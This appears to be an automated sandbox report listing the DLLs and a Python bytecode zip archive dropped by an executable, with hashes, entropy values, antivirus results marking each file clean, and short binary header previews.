                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):10240
                                                                                                                                                                                                                                                      Entropy (8bit):4.688658167085762
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:96:k0yZVVdJvbrqTuy/Th/Y0IluLfcC75JiCKs89EMz3DOWMot4BcX6gbW6O:XQVddiTHThQTctEEO3DEoKcqgbW6
                                                                                                                                                                                                                                                      MD5:5738D83E2A66B6ACE4F631A9255F81D9
                                                                                                                                                                                                                                                      SHA1:5B6EBB0B82738781732CF7CFD497F5AEB3453DE2
                                                                                                                                                                                                                                                      SHA-256:F2718ADADB6E9958081DCB5570EF737C66772C166A6AD8C0401ADCD9A70F46A0
                                                                                                                                                                                                                                                      SHA-512:BB21B62FD7FEE22DFA04274D0FA1AEC666C7845CD2EC3F01F1A0418A2C68F228EC0AE451C793CCAE3AA88F1EFEE5D6019138C0975497518F990B8511B2FD0E75
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......&6).bWG.bWG.bWG.k/..`WG.-+F.`WG.)/F.aWG.bWF.AWG.-+B.iWG.-+C.jWG.-+D.aWG.+O.cWG.+G.cWG.+..cWG.+E.cWG.RichbWG.........................PE..d...ca.c.........." ..."............P........................................p............`.........................................`'..t....'..P....P.......@...............`..,...."...............................!..@............ ...............................text...x........................... ..`.rdata....... ......................@..@.data...8....0....... ..............@....pdata.......@......."..............@..@.rsrc........P.......$..............@..@.reloc..,....`.......&..............@..B........................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\322pVOVprx.exe
                                                                                                                                                                                                                                                      File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):98736
                                                                                                                                                                                                                                                      Entropy (8bit):6.474996871326343
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:1536:BxhUQePlHhR46rXHHGI+mAAD4AeDuXMycecb8i10DWZz:Bvk4wHH+mZD4ADAecb8G1
                                                                                                                                                                                                                                                      MD5:F12681A472B9DD04A812E16096514974
                                                                                                                                                                                                                                                      SHA1:6FD102EB3E0B0E6EEF08118D71F28702D1A9067C
                                                                                                                                                                                                                                                      SHA-256:D66C3B47091CEB3F8D3CC165A43D285AE919211A0C0FCB74491EE574D8D464F8
                                                                                                                                                                                                                                                      SHA-512:7D3ACCBF84DE73FB0C5C0DE812A9ED600D39CD7ED0F99527CA86A57CE63F48765A370E913E3A46FFC2CCD48EE07D823DAFDD157710EEF9E7CC1EB7505DC323A2
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......A.&k..H8..H8..H8.I9..H8...8..H8..I8(.H8e.K9..H8e.L9..H8e.M9..H8e.H9..H8e..8..H8e.J9..H8Rich..H8................PE..d....9............" ... .....`......`.....................................................`A........................................0C..4...dK...............p..p....Z...'...........-..p............................,..@............................................text............................... ..`.rdata...A.......B..................@..@.data...0....`.......B..............@....pdata..p....p.......F..............@..@_RDATA..\............R..............@..@.rsrc................T..............@..@.reloc...............X..............@..B........................................................................................................................................................................................................................
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\322pVOVprx.exe
                                                                                                                                                                                                                                                      File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):63864
                                                                                                                                                                                                                                                      Entropy (8bit):6.138931224373156
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:1536:PQ/9uukni8rAr1QxZIbmQhID5ntG7SytPxE:IVuHe5QxZIbmQhID5nYHxE
                                                                                                                                                                                                                                                      MD5:2859C39887921DAD2FF41FEDA44FE174
                                                                                                                                                                                                                                                      SHA1:FAE62FAF96223CE7A3E6F7389A9B14B890C24789
                                                                                                                                                                                                                                                      SHA-256:AEBC378DB08617EA81A0A3A3BC044BCC7E6303E314630392DD51BAB12F879BD9
                                                                                                                                                                                                                                                      SHA-512:790BE0C95C81EB6D410E53FE8018E2CA5EFD1838DC60539EBB011911C36C8478333EE95989CFD1DDAF4F892B537AE8305EB4CD893906930DEAE59C8965CF2FBB
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........T..c...c...c.......c...b...c...f...c...g...c...`...c...b...c.Q.b...c...b...c...n...c...c...c.......c...a...c.Rich..c.........................PE..d...^.Vc.........." ...!.R..........`................................................X....`.............................................P.......d.......................x)..........pw..T...........................0v..@............p...............................text....P.......R.................. ..`.rdata..ZK...p...L...V..............@..@.data...............................@....pdata..............................@..@.rsrc...............................@..@.reloc..............................@..B................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\322pVOVprx.exe
                                                                                                                                                                                                                                                      File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):83328
                                                                                                                                                                                                                                                      Entropy (8bit):6.532254531979707
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:1536:douLz7p5Tcayt0KpkKWVa5cNRT8+smUxJIDtVH7SyD8Px:2uLz9meVamQ+sLxJIDtVHVsx
                                                                                                                                                                                                                                                      MD5:4101128E19134A4733028CFAAFC2F3BB
                                                                                                                                                                                                                                                      SHA1:66C18B0406201C3CFBBA6E239AB9EE3DBB3BE07D
                                                                                                                                                                                                                                                      SHA-256:5843872D5E2B08F138A71FE9BA94813AFEE59C8B48166D4A8EB0F606107A7E80
                                                                                                                                                                                                                                                      SHA-512:4F2FC415026D7FD71C5018BC2FFDF37A5B835A417B9E5017261849E36D65375715BAE148CE8F9649F9D807A63AC09D0FB270E4ABAE83DFA371D129953A5422CA
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........U...U...U...\.E._......W....+.V......X......]......Q......V......W...U..........]......T....).T......T...RichU...........PE..d...t.Vc.........." ...!.....^......,........................................P......nP....`.........................................p...H............0....... .. ........)...@..........T...........................p...@............................................text...O........................... ..`.rdata..L>.......@..................@..@.data...............................@....pdata.. .... ......................@..@.rsrc........0......................@..@.reloc.......@......................@..B........................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\322pVOVprx.exe
                                                                                                                                                                                                                                                      File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):181760
                                                                                                                                                                                                                                                      Entropy (8bit):6.176962076839488
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:3072:jm3K87nKna75PQrBjfFKYG50nzkL+CrXfU+PS7KiSTLkKKYYg4UO:jmb7Ma7KdFKEnOrXf7biSTLLIXUO
                                                                                                                                                                                                                                                      MD5:FDE9A1D6590026A13E81712CD2F23522
                                                                                                                                                                                                                                                      SHA1:CA99A48CAEA0DBACCF4485AFD959581F014277ED
                                                                                                                                                                                                                                                      SHA-256:16ECCC4BAF6CF4AB72ACD53C72A1F2B04D952E07E385E9050A933E78074A7D5B
                                                                                                                                                                                                                                                      SHA-512:A522661F5C3EEEA89A39DF8BBB4D23E6428C337AAC1D231D32B39005EA8810FCE26AF18454586E0E94E51EA4AC0E034C88652C1C09B1ED588AEAC461766981F4
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                      Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$......._......C...C...C..NC...CI..B...C}. C...CI..B...CI..B...CI..B...C..B...Cz..B...C...C...C..B...C..HC...C..B...C."C...C..B...CRich...C........................PE..d...m.b.........." .........B..............................................0............`..........................................g..l....g..................<............ .......M...............................M..8............................................text...x........................... ..`.rdata..............................@..@.data....\.......0...x..............@....pdata..<...........................@..@.rsrc...............................@..@.reloc....... ......................@..B................................................................................................................................................................................................................
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\322pVOVprx.exe
                                                                                                                                                                                                                                                      File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):123768
                                                                                                                                                                                                                                                      Entropy (8bit):6.017133084000375
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:3072:QC7Pgg3AwEWwSQJKoPfLSHcn0YJwyncXf9IDQPj6Exv:Qz5IX8jPfLSMJwykfoy
                                                                                                                                                                                                                                                      MD5:6A9CA97C039D9BBB7ABF40B53C851198
                                                                                                                                                                                                                                                      SHA1:01BCBD134A76CCD4F3BADB5F4056ABEDCFF60734
                                                                                                                                                                                                                                                      SHA-256:E662D2B35BB48C5F3432BDE79C0D20313238AF800968BA0FAA6EA7E7E5EF4535
                                                                                                                                                                                                                                                      SHA-512:DEDF7F98AFC0A94A248F12E4C4CA01B412DA45B926DA3F9C4CBC1D2CBB98C8899F43F5884B1BF1F0B941EDAEEF65612EA17438E67745962FF13761300910960D
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........:..[y..[y..[y..#.[y.. x..[y.. |..[y.. }..[y.. z..[y.. x..[y.O)}..[y.O)x..[y.).x..[y..[x.h[y.. t..[y.. y..[y.. ...[y.. {..[y.Rich.[y.................PE..d...n.Vc.........." ...!.............]...............................................[....`..........................................Q......TR..........................x)..............T...........................`...@............................................text............................... ..`.rdata...m.......n..................@..@.data...$=...p...8...b..............@....pdata..............................@..@.rsrc...............................@..@.reloc..............................@..B........................................................................................................................................................................................................................
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\322pVOVprx.exe
                                                                                                                                                                                                                                                      File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):251768
                                                                                                                                                                                                                                                      Entropy (8bit):6.543870948107038
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:6144:3JhhPXoWcz5HvcQpq9Sr9pmHboiYE9qWM53pLW1AmXYWtmVS9G:fNXoWcznq9Sr9pyKFh6eS9G
                                                                                                                                                                                                                                                      MD5:D47E6ACF09EAD5774D5B471AB3AB96FF
                                                                                                                                                                                                                                                      SHA1:64CE9B5D5F07395935DF95D4A0F06760319224A2
                                                                                                                                                                                                                                                      SHA-256:D0DF57988A74ACD50B2D261E8B5F2C25DA7B940EC2AAFBEE444C277552421E6E
                                                                                                                                                                                                                                                      SHA-512:52E132CE94F21FA253FED4CF1F67E8D4423D8C30224F961296EE9F64E2C9F4F7064D4C8405CD3BB67D3CF880FE4C21AB202FA8CF677E3B4DAD1BE6929DBDA4E2
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......\F1S.'_..'_..'_.._...'_..\^..'_..\Z..'_..\[..'_..\\..'_..\^..'_..U^..'_..'^..'_..\\..'_..\R..'_..\_..'_..\...'_..\]..'_.Rich.'_.................PE..d...k.Vc.........." ...!.v...<......|...............................................o.....`..........................................T..P....T..................H'......x)......P.......T...........................P...@............................................text...)u.......v.................. ..`.rdata...............z..............@..@.data....*...p...$...R..............@....pdata..H'.......(...v..............@..@.rsrc...............................@..@.reloc..P...........................@..B................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\322pVOVprx.exe
                                                                                                                                                                                                                                                      File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):63872
                                                                                                                                                                                                                                                      Entropy (8bit):6.166853300594844
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:1536:18njpHxGkYjEEEJkn8cw6ThID5IJt7SyiPx:GnjpHxRJ8w6ThID5IJtEx
                                                                                                                                                                                                                                                      MD5:DE4D104EA13B70C093B07219D2EFF6CB
                                                                                                                                                                                                                                                      SHA1:83DAF591C049F977879E5114C5FEA9BBBFA0AD7B
                                                                                                                                                                                                                                                      SHA-256:39BC615842A176DB72D4E0558F3CDCAE23AB0623AD132F815D21DCFBFD4B110E
                                                                                                                                                                                                                                                      SHA-512:567F703C2E45F13C6107D767597DBA762DC5CAA86024C87E7B28DF2D6C77CD06D3F1F97EED45E6EF127D5346679FEA89AC4DC2C453CE366B6233C0FA68D82692
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........A.g...g...g.......g..V....g..V....g..V....g..V....g..X....g.......g.......g...g..Qg..X....g..X....g..X.l..g..X....g..Rich.g..........................PE..d...u.Vc.........." ...!.T...~......@?....................................................`.............................................P.......................,........)......\...0}..T............................{..@............p..(............................text...YR.......T.................. ..`.rdata...N...p...P...X..............@..@.data...8...........................@....pdata..,...........................@..@.rsrc...............................@..@.reloc..\...........................@..B........................................................................................................................................................................................................................
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\322pVOVprx.exe
                                                                                                                                                                                                                                                      File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):158080
                                                                                                                                                                                                                                                      Entropy (8bit):6.835761878596918
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:3072:5mGf4k8d79MwyHiRr7tznf49mNoaGjQJplJIDe10Yhx:5Pf4FhMwyMAYOao6P
                                                                                                                                                                                                                                                      MD5:337B0E65A856568778E25660F77BC80A
                                                                                                                                                                                                                                                      SHA1:4D9E921FEAEE5FA70181EBA99054FFA7B6C9BB3F
                                                                                                                                                                                                                                                      SHA-256:613DE58E4A9A80EFF8F8BC45C350A6EAEBF89F85FFD2D7E3B0B266BF0888A60A
                                                                                                                                                                                                                                                      SHA-512:19E6DA02D9D25CCEF06C843B9F429E6B598667270631FEBE99A0D12FC12D5DA4FB242973A8351D3BF169F60D2E17FE821AD692038C793CE69DFB66A42211398E
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........X...6D..6D..6D..D..6D@.7E..6D@.3E..6D@.2E..6D@.5E..6DN.7E..6D..7E..6D..7D..6DN.;E..6DN.6E..6DN..D..6DN.4E..6DRich..6D........PE..d...~.Vc.........." ...!.d...........8..............................................O.....`..........................................%..L...\%..x....p.......P.......@...)......8.......T...........................p...@............................................text...~c.......d.................. ..`.rdata..............h..............@..@.data........@......................@....pdata.......P....... ..............@..@.rsrc........p.......4..............@..@.reloc..8............>..............@..B................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\322pVOVprx.exe
                                                                                                                                                                                                                                                      File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):33144
                                                                                                                                                                                                                                                      Entropy (8bit):6.322628273839125
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:768:7HI6RwgJ5xeTjOc88hnJ8RIDRtFBYiSyvg7PxWEwm:rIoJ5UTjOc88hJ8RIDRtFB7SyI7Px7
                                                                                                                                                                                                                                                      MD5:1386DBC6DCC5E0BE6FEF05722AE572EC
                                                                                                                                                                                                                                                      SHA1:470F2715FAFD5CAFA79E8F3B0A5434A6DA78A1BA
                                                                                                                                                                                                                                                      SHA-256:0AE3BF383FF998886F97576C55D6BF0A076C24395CF6FCD2265316E9A6E8C007
                                                                                                                                                                                                                                                      SHA-512:CA6E5C33273F460C951CB8EC1D74CE61C0025E2EAD6D517C18A6B0365341A0FD334E8976006CD62B72EB5620CCC42CFDD5196E8B10691B8F19F69F851A440293
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........w*.|.y.|.y.|.y...y.|.y...x.|.y...x.|.y...x.|.y...x.|.y...x.|.y.|.y.|.yY..x.|.y...x.|.y...x.|.y...y.|.y...x.|.yRich.|.y................PE..d...c.Vc.........." ...!.....<......0................................................5....`.........................................0D..`....D..x....p.......`.......X..x)...........4..T...........................p3..@............0...............................text............................... ..`.rdata..^....0... ..."..............@..@.data........P.......B..............@....pdata.......`.......H..............@..@.rsrc........p.......L..............@..@.reloc...............V..............@..B........................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\322pVOVprx.exe
                                                                                                                                                                                                                                                      File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):49536
                                                                                                                                                                                                                                                      Entropy (8bit):6.366550718884209
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:768:elMCtmIWpU6xgIiXgtloX1JuB65VIDst2YiSyvYPxWEwW:elMFxgIIJu45VIDst27SywPx
                                                                                                                                                                                                                                                      MD5:01AD7CA8BC27F92355FD2895FC474157
                                                                                                                                                                                                                                                      SHA1:15948CD5A601907FF773D0B48E493ADF0D38A1A6
                                                                                                                                                                                                                                                      SHA-256:A083E83F609ED7A2FC18A95D44D8F91C9DC74842F33E19E91988E84DB94C3B5B
                                                                                                                                                                                                                                                      SHA-512:8FE6AC8430F8DDE45C74F45575365753042642DC9FA9DEFBCF25AE1832BAF6ABB1EA1AD6D087E4ECE5D0590E36CEE1BEEA99845AEF6182C1EEC4BAFDF9557604
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........hW{..9(..9(..9(.q.(..9(.r8)..9(.r<)..9(.r=)..9(.r:)..9(.r8)..9(..8(..9(S{8)..9(S{=)..9(.r4)..9(.r9)..9(.r.(..9(.r;)..9(Rich..9(........PE..d...e.Vc.........." ...!.B...X............................................................`.........................................0...X................................)......,....f..T...........................Pe..@............`...............................text...:A.......B.................. ..`.rdata..$5...`...6...F..............@..@.data................|..............@....pdata..............................@..@.rsrc...............................@..@.reloc..,...........................@..B........................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\322pVOVprx.exe
                                                                                                                                                                                                                                                      File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):31104
                                                                                                                                                                                                                                                      Entropy (8bit):6.35436407327013
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:384:cQuCvO+MZFryl9SDCg6rXv5mkWsnTBq9ID7UJIYiSy1pCQYIPxh8E9VF0Nyb9:cl+yFp6rXRmk5s9ID7UeYiSyv7PxWER
                                                                                                                                                                                                                                                      MD5:FF8300999335C939FCCE94F2E7F039C0
                                                                                                                                                                                                                                                      SHA1:4FF3A7A9D9CA005B5659B55D8CD064D2EB708B1A
                                                                                                                                                                                                                                                      SHA-256:2F71046891BA279B00B70EB031FE90B379DBE84559CF49CE5D1297EA6BF47A78
                                                                                                                                                                                                                                                      SHA-512:F29B1FD6F52130D69C8BD21A72A71841BF67D54B216FEBCD4E526E81B499B9B48831BB7CDFF0BFF6878AAB542CA05D6326B8A293F2FB4DD95058461C0FD14017
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........MX..#...#...#.......#..."...#...&...#...'...#... ...#..."...#.Q."...#..."...#.......#...#...#.......#...!...#.Rich..#.........................PE..d...d.Vc.........." ...!.....8.......................................................K....`..........................................C..L....C..d....p.......`.......P...)..........p4..T...........................03..@............0..0............................text............................... ..`.rdata..R....0......................@..@.data...x....P.......<..............@....pdata.......`.......@..............@..@.rsrc........p.......D..............@..@.reloc...............N..............@..B................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\322pVOVprx.exe
                                                                                                                                                                                                                                                      File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):78200
                                                                                                                                                                                                                                                      Entropy (8bit):6.239347454910878
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:1536:HJlcAdpEVuju9/s+S+pJGQRivVia3i9IDQw17Sy+Px3sxi:H7ce+uju9/sT+pJGdvVp3i9IDQw1kxZ
                                                                                                                                                                                                                                                      MD5:8140BDC5803A4893509F0E39B67158CE
                                                                                                                                                                                                                                                      SHA1:653CC1C82BA6240B0186623724AEC3287E9BC232
                                                                                                                                                                                                                                                      SHA-256:39715EF8D043354F0AB15F62878530A38518FB6192BC48DA6A098498E8D35769
                                                                                                                                                                                                                                                      SHA-512:D0878FEE92E555B15E9F01CE39CFDC3D6122B41CE00EC3A4A7F0F661619F83EC520DCA41E35A1E15650FB34AD238974FE8019577C42CA460DDE76E3891B0E826
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........w....................*.......*.......*.......*.......$...............y.......$.......$.......$.......$.......Rich............................PE..d...s.Vc.........." ...!.l...........%.......................................P......h.....`.........................................@...P............0....... ..x.......x)...@..........T...............................@............................................text....k.......l.................. ..`.rdata..Dt.......v...p..............@..@.data...............................@....pdata..x.... ......................@..@.rsrc........0......................@..@.reloc.......@......................@..B................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\322pVOVprx.exe
                                                                                                                                                                                                                                                      File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):118656
                                                                                                                                                                                                                                                      Entropy (8bit):6.2256831065058815
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:3072:fArVnbGK9SGnh8u6rqMD6ciFCrl14zZvV9NdJRvdO5yt6sqM7VjEP/OsYpxtXr9T:YrVSK9SGnh8u6ESx5CVQP/yXZ
                                                                                                                                                                                                                                                      MD5:D4324D1E8DB7FCF220C5C541FECCE7E3
                                                                                                                                                                                                                                                      SHA1:1CAF5B23AE47F36D797BC6BDD5B75B2488903813
                                                                                                                                                                                                                                                      SHA-256:DDBED9D48B17C54FD3005F5A868DD63CB8F3EFE2C22C1821CEBB2FE72836E446
                                                                                                                                                                                                                                                      SHA-512:71D56D59E019CF42CEA88203D9C6E50F870CD5C4D5C46991ACBFF3AB9FF13F78D5DBF5D1C2112498FC7E279D41EE27DB279B74B4C08A60BB4098F9E8C296B5D8
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......pU..44..44..44..=Ls.04...O.64...O..54...O.94...O.<4...O.74...O.14...F.64..44.15...O.=4...O..54...O..54...O.54..Rich44..........................PE..d.....Vc.........." ...!............ ....................................................`..........................................Z..P....Z...........................)..............T...........................p...@............................................text............................... ..`.rdata..\...........................@..@.data................n..............@....pdata..............................@..@.rsrc...............................@..@.reloc..............................@..B........................................................................................................................................................................................................................
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\322pVOVprx.exe
                                                                                                                                                                                                                                                      File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):159616
                                                                                                                                                                                                                                                      Entropy (8bit):5.9948013841482926
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:3072:qFrIQQey4VWR98w/PQQcXo8uOVrGxn+SQOXLkd1ItS+Q8YuAfxJIDt75EHx:eEeRV29//4QcJuOynyvxX
                                                                                                                                                                                                                                                      MD5:069BCCC9F31F57616E88C92650589BDD
                                                                                                                                                                                                                                                      SHA1:050FC5CCD92AF4FBB3047BE40202D062F9958E57
                                                                                                                                                                                                                                                      SHA-256:CB42E8598E3FA53EEEBF63F2AF1730B9EC64614BDA276AB2CD1F1C196B3D7E32
                                                                                                                                                                                                                                                      SHA-512:0E5513FBE42987C658DBA13DA737C547FF0B8006AECF538C2F5CF731C54DE83E26889BE62E5C8A10D2C91D5ADA4D64015B640DAB13130039A5A8A5AB33A723DC
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......B3"..RL,.RL,.RL,.*.,.RL,.)M-.RL,.)I-.RL,.)H-.RL,.)O-.RL,.)M-.RL,b(M-.RL,.RM,.SL,. M-.RL,.)A-.RL,.)L-.RL,.).,.RL,.)N-.RL,Rich.RL,........................PE..d.....Vc.........." ...!............l+....................................................`.............................................d............`.......P.......F...)...p..4... ...T...............................@...............x............................text............................... ..`.rdata..............................@..@.data....j.......f..................@....pdata.......P......."..............@..@.rsrc........`......................@..@.reloc..4....p.......8..............@..B........................................................................................................................................................................................................................
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\322pVOVprx.exe
                                                                                                                                                                                                                                                      File Type:Zip archive data, at least v2.0 to extract, compression method=store
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):1753678
                                                                                                                                                                                                                                                      Entropy (8bit):5.571704061856361
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:24576:eQRqL5TPAxNWlUKdcubgAnjK0+0AWfh2rpdYMbPeMyGTjdma4jdfs:eQRqL2xNzeVs4aP
                                                                                                                                                                                                                                                      MD5:F0D87B0F1BA30F95EC119CAC9346D9D7
                                                                                                                                                                                                                                                      SHA1:C6B827B5F29049AACDC052270E74132134616B74
                                                                                                                                                                                                                                                      SHA-256:26DB516391FE332A60CBE0B34C5C51F2B67863E27368138411D21DFB98D8C348
                                                                                                                                                                                                                                                      SHA-512:FCA4EBF5402BD39B81AA7E9A776666FC7FAC01C04E4818BBF8BB7A8BA05E1127CB1A73E39BA5205858013DBF79B997277361AAE1A483097F289CE361E9BB4B24
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:PK..........!...A............._collections_abc.pyc............................................d.Z.d.d.l.m.Z.m.Z...d.d.l.Z...e.e.e.........................Z...e.d...............Z.d...Z...e.e...............Z.[.g.d...Z.d.Z...e...e.d.............................Z...e...e...e...........................................Z...e...e.i.................................................................Z...e...e.i.................................................................Z...e...e.i.................................................................Z...e...e.g.............................Z...e...e...e.g...........................................Z...e...e...e.d...........................................Z...e...e...e.d.d.z.............................................Z...e...e...e...........................................Z...e...e.d.............................Z ..e...e.d.............................Z!..e...e...e"..........................................Z#..e.i.......................................
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\322pVOVprx.exe
                                                                                                                                                                                                                                                      File Type:ASCII text
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):275233
                                                                                                                                                                                                                                                      Entropy (8bit):6.04917730761317
                                                                                                                                                                                                                                                      Encrypted:false
